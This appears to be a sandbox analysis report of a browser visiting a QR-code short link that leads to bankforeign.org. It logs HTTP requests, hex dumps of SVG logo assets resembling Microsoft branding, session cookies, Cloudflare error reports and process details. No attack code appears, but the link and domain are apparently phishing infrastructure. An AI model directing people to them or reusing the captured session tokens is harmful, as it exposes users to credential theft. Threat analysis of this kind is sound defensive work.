                                                            2024-02-01 20:38:49 UTC706INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                                            Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                                            2024-02-01 20:38:49 UTC1369INData Raw: 2e 34 31 34 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 31 36 38 2c 34 2e 34 33 31 2c 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36 2c 33 2e 32 31 36 2c 30 2c 30 2c 30 2c 2e 38 31 33 2c 32 2e 33 33 38 2c 32 2e 39 33 36 2c 32 2e 39 33 36 2c 30 2c 30 2c 30 2c 32 2e 32 30 39 2e 38 33 37 4d 36 35 2e 34 2c 38 2e 33 34 33 61 32 2e 39 35 32 2c 32 2e 39 35 32 2c 30 2c 30 2c 31 2c 2e 35 2e 30 33 39 2c
                                                            Data Ascii: .414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,
                                                            2024-02-01 20:38:49 UTC1369INData Raw: 32 31 33 2c 32 2e 36 35 35 2c 32 2e 36 35 35 2c 30 2c 30 2c 31 2d 2e 35 33 39 2d 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30 2d 31 2e 30 37 38 2d 2e 35 32 39 2c 33 2e 36 2c 33 2e 36 2c 30 2c 30 2c 30 2d 31 2e 32 32 32 2d 2e 32 32 31 2c 31 2e 37 38 31 2c 31 2e 37 38 31 2c 30 2c 30 2c 30 2d 31 2e 30 33 34 2e 32 36 2e 38 32 34 2e 38 32 34 2c 30 2c 30 2c 30 2d 2e 33 37 31 2e 37 31 32 4d 38
                                                            Data Ascii: 213,2.655,2.655,0,0,1-.539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529,3.6,3.6,0,0,0-1.222-.221,1.781,1.781,0,0,0-1.034.26.824.824,0,0,0-.371.712M8
                                                            2024-02-01 20:38:49 UTC214INData Raw: 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 62 39 30 30 22 2f 3e 3c 2f 73 76 67 3e 0d 0a
                                                            Data Ascii: "/><rect x="12.069" width="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" height="10.931" fill="#ffb900"/></svg>
                                                            2024-02-01 20:38:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            45192.168.2.449788104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:49 UTC598OUTGET /x/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb75 HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
                                                            2024-02-01 20:38:49 UTC636INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:49 GMT
                                                            Content-Type: image/svg+xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Last-Modified: Thu, 01 Feb 2024 18:12:11 GMT
                                                            Vary: Accept-Encoding
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zYSWdTwHU%2Ft%2F0jklOXuOEZBTIvdMPzLHDqjn2G%2FC9LO3vwe37riuo0ne4k%2F1ZcAzQQtSgHpxNNcgKBoXYtjjjtsgnUmGHM9NvTfE0tA1whGhjtJUcjAeBwRp1Sd2jJZk%2BeE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ed000d8bed53c3-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:49 UTC733INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                            Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                            2024-02-01 20:38:49 UTC1138INData Raw: 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 34 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 2f
                                                            Data Ascii: rl(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></
                                                            2024-02-01 20:38:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            46192.168.2.449789104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:49 UTC572OUTGET /ASSETS/img/sig-op.svg HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
                                                            2024-02-01 20:38:49 UTC665INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:49 GMT
                                                            Content-Type: image/svg+xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Last-Modified: Thu, 01 Feb 2024 18:12:11 GMT
                                                            Vary: Accept-Encoding
                                                            Cache-Control: max-age=14400
                                                            CF-Cache-Status: MISS
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7QaMGIEc9gchFEUaQP5n9JG07%2FyeaYKGEWqRoQFbiogYlu%2F8ZyYw4BROHqmmyfIanPQU6hA37OWlNqEYfq2p0oC1fcBawYw%2FI%2FJyt4OtBBI1oF4mtb9%2Bw4o%2FogLyV2mVxCM%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ed000d9f7b135d-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:49 UTC704INData Raw: 36 33 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 61 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 7d 2e 62 7b 66 69 6c 6c 3a 23 34 30 34 30 34 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39
                                                            Data Ascii: 638<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689
                                                            2024-02-01 20:38:49 UTC895INData Raw: 30 2e 30 31 35 2c 30 2c 30 2c 31 2d 2e 31 32 35 2c 31 2e 35 37 38 2c 31 30 2e 38 37 39 2c 31 30 2e 38 37 39 2c 30 2c 30 2c 31 2d 2e 33 35 39 2c 31 2e 35 33 31 5a 6d 2d 32 2c 2e 38 34 34 4c 32 37 2e 32 31 39 2c 32 32 2e 36 34 31 61 31 34 2e 37 31 36 2c 31 34 2e 37 31 36 2c 30 2c 30 2c 30 2c 2e 35 36 32 2d 31 2e 37 38 32 41 37 2e 37 35 31 2c 37 2e 37 35 31 2c 30 2c 30 2c 30 2c 32 38 2c 31 39 61 38 2e 37 38 36 2c 38 2e 37 38 36 2c 30 2c 30 2c 30 2d 2e 37 2d 33 2e 35 2c 38 2e 39 2c 38 2e 39 2c 30 2c 30 2c 30 2d 31 2e 39 33 38 2d 32 2e 38 35 39 41 39 2e 32 36 39 2c 39 2e 32 36 39 2c 30 2c 30 2c 30 2c 32 32 2e 35 2c 31 30 2e 37 31 39 2c 38 2e 39 2c 38 2e 39 2c 30 2c 30 2c 30 2c 31 39 2c 31 30 61 38 2e 37 38 36 2c 38 2e 37 38 36 2c 30 2c 30 2c 30 2d 33 2e 35 2e
                                                            Data Ascii: 0.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.
                                                            2024-02-01 20:38:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            47192.168.2.44979235.190.80.14433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:39:10 UTC534OUTOPTIONS /report/v3?s=0S4PiP0gxocJhKQemQtsT797FCYuyJA0Lc5eZmR5DHkBAbV2hPmaVeY9qEqq9L3ty%2FbEUuwvg736Di0HPBf6U%2FMUaISYZglgHqzPpEiZbY2GOC5E9jkVOoKnjMTh2o0WiMY%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Origin: https://bankforeign.org
                                                            Access-Control-Request-Method: POST
                                                            Access-Control-Request-Headers: content-type
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:39:10 UTC336INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            access-control-max-age: 86400
                                                            access-control-allow-methods: OPTIONS, POST
                                                            access-control-allow-origin: *
                                                            access-control-allow-headers: content-type, content-length
                                                            date: Thu, 01 Feb 2024 20:39:10 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            48192.168.2.44979335.190.80.14433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:39:10 UTC542OUTOPTIONS /report/v3?s=7QaMGIEc9gchFEUaQP5n9JG07%2FyeaYKGEWqRoQFbiogYlu%2F8ZyYw4BROHqmmyfIanPQU6hA37OWlNqEYfq2p0oC1fcBawYw%2FI%2FJyt4OtBBI1oF4mtb9%2Bw4o%2FogLyV2mVxCM%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Origin: https://bankforeign.org
                                                            Access-Control-Request-Method: POST
                                                            Access-Control-Request-Headers: content-type
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:39:10 UTC336INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            access-control-max-age: 86400
                                                            access-control-allow-methods: OPTIONS, POST
                                                            access-control-allow-origin: *
                                                            access-control-allow-headers: content-length, content-type
                                                            date: Thu, 01 Feb 2024 20:39:10 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            49192.168.2.44979435.190.80.14433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:39:10 UTC477OUTPOST /report/v3?s=0S4PiP0gxocJhKQemQtsT797FCYuyJA0Lc5eZmR5DHkBAbV2hPmaVeY9qEqq9L3ty%2FbEUuwvg736Di0HPBf6U%2FMUaISYZglgHqzPpEiZbY2GOC5E9jkVOoKnjMTh2o0WiMY%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 1864
                                                            Content-Type: application/reports+json
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:39:10 UTC1864OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 38 32 32 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 35 34 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 62 61 6e 6b 66 6f 72 65 69 67 6e 2e 6f 72 67 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 37 33 2e 38 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c
                                                            Data Ascii: [{"age":58220,"body":{"elapsed_time":654,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://bankforeign.org/","sampling_fraction":1.0,"server_ip":"104.21.73.88","status_code":403,"type":"http.error"},"type":"network-error","url
                                                            2024-02-01 20:39:10 UTC168INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            date: Thu, 01 Feb 2024 20:39:10 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            50192.168.2.44979635.190.80.14433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:39:10 UTC485OUTPOST /report/v3?s=7QaMGIEc9gchFEUaQP5n9JG07%2FyeaYKGEWqRoQFbiogYlu%2F8ZyYw4BROHqmmyfIanPQU6hA37OWlNqEYfq2p0oC1fcBawYw%2FI%2FJyt4OtBBI1oF4mtb9%2Bw4o%2FogLyV2mVxCM%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 1043
                                                            Content-Type: application/reports+json
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:39:10 UTC1043OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 31 32 38 39 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 35 33 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 37 33 2e 38 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 61 6e 6b 66 6f 72 65 69 67 6e 2e 6f
                                                            Data Ascii: [{"age":31289,"body":{"elapsed_time":537,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.73.88","status_code":400,"type":"http.error"},"type":"network-error","url":"https://bankforeign.o
                                                            2024-02-01 20:39:10 UTC168INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            date: Thu, 01 Feb 2024 20:39:10 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            020406080s020406080100

                                                            Click to jump to process

                                                            020406080s0.0050100MB

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:21:38:02
                                                            Start date:01/02/2024
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                                                            Imagebase:0x7ff76e190000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:2
                                                            Start time:21:38:05
                                                            Start date:01/02/2024
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2628 --field-trial-handle=2440,i,8409755720781432192,11699646399889136844,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                            Imagebase:0x7ff76e190000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:3
                                                            Start time:21:38:07
                                                            Start date:01/02/2024
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "https://qrco.de/belJ9F
                                                            Imagebase:0x7ff76e190000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            No disassembly